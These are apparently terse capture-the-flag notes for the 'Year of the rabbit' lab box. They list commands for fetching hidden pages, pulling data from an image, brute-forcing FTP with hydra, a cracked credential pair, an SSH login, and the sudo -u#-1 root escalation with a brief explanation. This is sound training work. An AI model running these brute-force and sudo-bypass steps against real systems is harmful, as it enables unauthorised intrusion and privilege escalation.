Year of the rabbit

March 31, 2024

curl -iL http://10.10.133.97/sup3r_s3cr3t_fl4g.php

http://10.10.133.97/WExYY2Cv-qU/

strings Hot_babe.png

hydra -l ftpuser -P ftp-pass-wordlist.txt 10.10.133.97 ftp

ftpuser:5iez1wGXKfPKQ

locate s3cr3t

ssh gwendoline@10.10.133.97

sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt

Description :
Sudo doesn't check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv
-u#-1 returns as 0 which is root's id

PreviousChill Hack NextBecome a hacker

Last updated 1 year ago